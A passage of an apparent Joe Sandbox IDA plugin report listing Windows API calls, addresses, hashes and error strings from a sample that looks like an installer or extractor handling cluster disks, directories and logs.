                                                              • __EH_prolog3.LIBCMT ref: 00225229
                                                                • Part of subcall function 00224F70: __EH_prolog3.LIBCMT ref: 00224F77
                                                                • Part of subcall function 00228054: __EH_prolog3.LIBCMT ref: 0022805B
                                                                • Part of subcall function 00228054: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 0022808E
                                                                • Part of subcall function 00225293: __EH_prolog3.LIBCMT ref: 0022529A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 3802047751-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00220B49
                                                                • Part of subcall function 00224F70: __EH_prolog3.LIBCMT ref: 00224F77
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendMessageA.USER32(00000405,00000000,00000000,00216381), ref: 002169D5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00227E46: CreateEventA.KERNEL32(00000000,?,00000000,00000000), ref: 00227E5B
                                                              • GetLastError.KERNEL32 ref: 0022803E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorEventLast
                                                              • String ID:
                                                              • API String ID: 545576003-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00219CA3: CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              • GetLastError.KERNEL32(?,40000000,00000005,00000002,00000080,00000000,00000000,?,00215AE3,0023BEF0), ref: 00218444
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLast
                                                              • String ID:
                                                              • API String ID: 1214770103-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,0023BEF0), ref: 0021930C
                                                              • GetLastError.KERNEL32 ref: 00219319
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00219354
                                                              • GetLastError.KERNEL32 ref: 0021935A
                                                              • FindFirstFileW.KERNEL32(00000000,?,\*.*,00000000,00000000), ref: 002193CC
                                                              • GetLastError.KERNEL32 ref: 002193DD
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,00000000), ref: 002194C3
                                                              • GetLastError.KERNEL32 ref: 002194C9
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000000), ref: 002194E7
                                                              • GetLastError.KERNEL32 ref: 002194F1
                                                              • FindNextFileW.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00219516
                                                              • GetLastError.KERNEL32 ref: 00219524
                                                              • FindClose.KERNEL32(000000FF,?,00000000,00000000,0023BEF0), ref: 00219556
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,00000000,00000000,0023BEF0), ref: 0021957A
                                                              • GetLastError.KERNEL32 ref: 00219584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$AttributesFind$CloseDeleteDirectoryFirstNextRemove
                                                              • String ID: \*.*
                                                              • API String ID: 2447602905-1173974218
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,00000000,?,?,00000000,00000000), ref: 0021A842
                                                              • GetLastError.KERNEL32 ref: 0021A853
                                                              • FindNextFileW.KERNEL32(?,00000010), ref: 0021A904
                                                              • CloseHandle.KERNEL32(000000FF), ref: 0021A954
                                                              • FindClose.KERNEL32(000000FF), ref: 0021A969
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFile$ErrorFirstHandleLastNext
                                                              • String ID: *.*
                                                              • API String ID: 3695076719-438819550
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(kernel32.dll,?,0021B503), ref: 0021B4C2
                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0021B4D9
                                                              • GetProcAddress.KERNEL32(DecodePointer), ref: 0021B4EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                              • API String ID: 2238633743-1525541703
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 00228FF5
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00229004
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00229010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcVersion
                                                              • String ID: KERNEL32.DLL$SetProcessDEPPolicy
                                                              • API String ID: 3310240892-1809394400
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 0022AE0F
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0022AE24
                                                              • UnhandledExceptionFilter.KERNEL32(00211E14), ref: 0022AE2F
                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0022AE4B
                                                              • TerminateProcess.KERNEL32(00000000), ref: 0022AE52
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                              • String ID:
                                                              • API String ID: 2579439406-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,00000000,00000000,0000000C,00000000,00000000,?,?,?,00215D40,?,00000000,00000000), ref: 00218DE2
                                                              • GetLastError.KERNEL32(?,?,?,00215D40,?,00000000,00000000,0000000C,00000000), ref: 00218DEF
                                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,00215D40,?,00000000,00000000,0000000C,00000000), ref: 00218E27
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                              • String ID:
                                                              • API String ID: 1365068426-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$0
                                                              • API String ID: 0-535590263
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00019767), ref: 002297B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 002171D4
                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 002171DF
                                                              • GetDlgItem.USER32(?,000003F0), ref: 00217203
                                                              • GetLastError.KERNEL32 ref: 00217210
                                                              • GetDlgItem.USER32(?,000003F0), ref: 002172FD
                                                              • GetLastError.KERNEL32 ref: 00217307
                                                              • SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 00217341
                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0021734D
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • EndDialog.USER32(00000001,80070642), ref: 0021738C
                                                              Strings
                                                              • Failed to get the text of the label, xrefs: 00217120
                                                              • Call to the SHGetPathFromIDListW failed, xrefs: 00217184
                                                              • Failed to allocate memory for the directory control value, xrefs: 00217289
                                                              • Failed to allocate memory for the title, xrefs: 002170A3
                                                              • Failed to allocate memory for the directory value, xrefs: 00217084
                                                              • Failed to get text from the directory control, xrefs: 002172C6
                                                              • Failed to get the directory control, xrefs: 002171BA, 00217231
                                                              • Failed to get text length from the directory control, xrefs: 0021726D
                                                              • Failed to get the label control, xrefs: 002170E2
                                                              • Failed to get the directory control., xrefs: 00217328
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ErrorHeapItemLast$AllocDialogLongProcessWindow
                                                              • String ID: Call to the SHGetPathFromIDListW failed$Failed to allocate memory for the directory control value$Failed to allocate memory for the directory value$Failed to allocate memory for the title$Failed to get text from the directory control$Failed to get text length from the directory control$Failed to get the directory control$Failed to get the directory control.$Failed to get the label control$Failed to get the text of the label
                                                              • API String ID: 2993860606-745645607
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,002290DE), ref: 0022A921
                                                              • __mtterm.LIBCMT ref: 0022A92D
                                                                • Part of subcall function 0022A5DA: _DecodePointerInternal@4.G5K9HNJ7(00000005,0022AA8F,?,002290DE), ref: 0022A5EB
                                                                • Part of subcall function 0022A5DA: TlsFree.KERNEL32(0000000E,0022AA8F,?,002290DE), ref: 0022A605
                                                                • Part of subcall function 0022A5DA: DeleteCriticalSection.KERNEL32(00000000,00000000,0021B4F9,?,0022AA8F,?,002290DE), ref: 0022D09B
                                                                • Part of subcall function 0022A5DA: _free.LIBCMT ref: 0022D09E
                                                                • Part of subcall function 0022A5DA: DeleteCriticalSection.KERNEL32(0000000E,0021B4F9,?,0022AA8F,?,002290DE), ref: 0022D0C5
                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0022A943
                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0022A950
                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0022A95D
                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0022A96A
                                                              • TlsAlloc.KERNEL32(?,002290DE), ref: 0022A9BA
                                                              • TlsSetValue.KERNEL32(00000000,?,002290DE), ref: 0022A9D5
                                                              • __init_pointers.LIBCMT ref: 0022A9DF
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022A9F0
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022A9FD
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022AA0A
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022AA17
                                                              • _DecodePointerInternal@4.G5K9HNJ7(Function_0001A772,?,002290DE), ref: 0022AA38
                                                              • __calloc_crt.LIBCMT ref: 0022AA4D
                                                              • _DecodePointerInternal@4.G5K9HNJ7(00000000,?,002290DE), ref: 0022AA67
                                                              • GetCurrentThreadId.KERNEL32 ref: 0022AA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Internal@4Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                              • API String ID: 1131704290-3819984048
                                                              • Opcode ID: f648e5b7e7890916c40a977a3089b2dc448818eff3d6021dedd1c4fab21fb6e1
                                                              • Instruction ID: b92e5418a5741ed773ec4f1898f4706b376f12f69e830866b3162760bd21a678
                                                              • Opcode Fuzzy Hash: f648e5b7e7890916c40a977a3089b2dc448818eff3d6021dedd1c4fab21fb6e1
                                                              • Instruction Fuzzy Hash: C9317231922222AFD762AFB5BC0E75A3FB1FB59360701552AE718C36B0DB708461CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCommandLineW.KERNEL32(?,00000000,0023BEF0), ref: 00216C76
                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00216C84
                                                              • GetLastError.KERNEL32 ref: 00216C91
                                                              • lstrlenW.KERNEL32(00000001), ref: 00216CF6
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00213E10,000000FF), ref: 00216D13
                                                              • lstrlenW.KERNEL32(?), ref: 00216D40
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00213E34,000000FF), ref: 00216D5D
                                                              • lstrlenW.KERNEL32(?), ref: 00216D90
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00213E64,000000FF), ref: 00216DAD
                                                              • lstrlenW.KERNEL32(?), ref: 00216DDD
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000001,00213E6C,000000FF), ref: 00216DF9
                                                              • LocalFree.KERNEL32(?), ref: 00216EE1
                                                              Strings
                                                              • Failed to allocate extract directory, xrefs: 00216D84
                                                              • Failed to get command line., xrefs: 00216CB2
                                                              • Failed to allocate box path, xrefs: 00216D34
                                                              • Failed to allocate log, xrefs: 00216DD1
                                                              • Failed to get path to executable., xrefs: 00216E85
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CompareStringlstrlen$CommandLine$ArgvErrorFreeLastLocal
                                                              • String ID: Failed to allocate box path$Failed to allocate extract directory$Failed to allocate log$Failed to get command line.$Failed to get path to executable.
                                                              • API String ID: 881607980-1268566871
                                                              • Opcode ID: 51891aa1df21ba808e5bd4a0238500105f5a46ddd856808e80a3b037bb6c5f33
                                                              • Instruction ID: 6fcaf42c43ede4dc1d3a854fc824b6935f37bed2963dff5a1d731222255186fe
                                                              • Opcode Fuzzy Hash: 51891aa1df21ba808e5bd4a0238500105f5a46ddd856808e80a3b037bb6c5f33
                                                              • Instruction Fuzzy Hash: BD71D779E20216ABDB209F54DC89EEE76E6EF35720F214615F941E7280D630DDE1CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetProcessHeap.KERNEL32(00000000,?,?,01000191,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00217DDD,00000000), ref: 00218016
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00217DDD,00000000,00000000,?,?,?,00217780,?,00000000,00000000,0023BEF0), ref: 00218019
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,01000191,?,0100002D,?,00000000,00000000,00000000), ref: 0021802F
                                                              • HeapFree.KERNEL32(00000000), ref: 00218032
                                                              Strings
                                                              • Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE, xrefs: 00217F34
                                                              • Ignoring cluster resource as it's not a Physical Disk, xrefs: 00217F5D
                                                              • Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO, xrefs: 00217F87
                                                              • Ignoring the partition '%S' because it doesn't look like a DOS name, xrefs: 00217FBD
                                                              • Found a partition on cluster resource: '%S', xrefs: 00217FA7
                                                              • Failed to allocate an empty drive map, xrefs: 00217F0A
                                                              • Cluster resource type: '%S', xrefs: 00217F3E
                                                              • Physical Disk, xrefs: 00217F49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free$Alloc
                                                              • String ID: Cluster resource type: '%S'$Failed to allocate an empty drive map$Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE$Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO$Found a partition on cluster resource: '%S'$Ignoring cluster resource as it's not a Physical Disk$Ignoring the partition '%S' because it doesn't look like a DOS name$Physical Disk
                                                              • API String ID: 3689955550-1827234441
                                                              • Opcode ID: 81167cc28c28823af27056e94acc2aaeb9f9d06ef7007a2fdee9a861fc153e87
                                                              • Instruction ID: 9a17a37b97f8b31f92477ddfe2498a95b922dbb856ea4e839d153393cf44b67f
                                                              • Opcode Fuzzy Hash: 81167cc28c28823af27056e94acc2aaeb9f9d06ef7007a2fdee9a861fc153e87
                                                              • Instruction Fuzzy Hash: 01419F7196820AFACB11EFA08C869EFBBF9EFB4340F214419F505A2141DB705AE6CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 002184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 002184E2
                                                                • Part of subcall function 002184C7: swprintf.LIBCMT ref: 00218513
                                                              • GetLastError.KERNEL32(?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0021AEA7
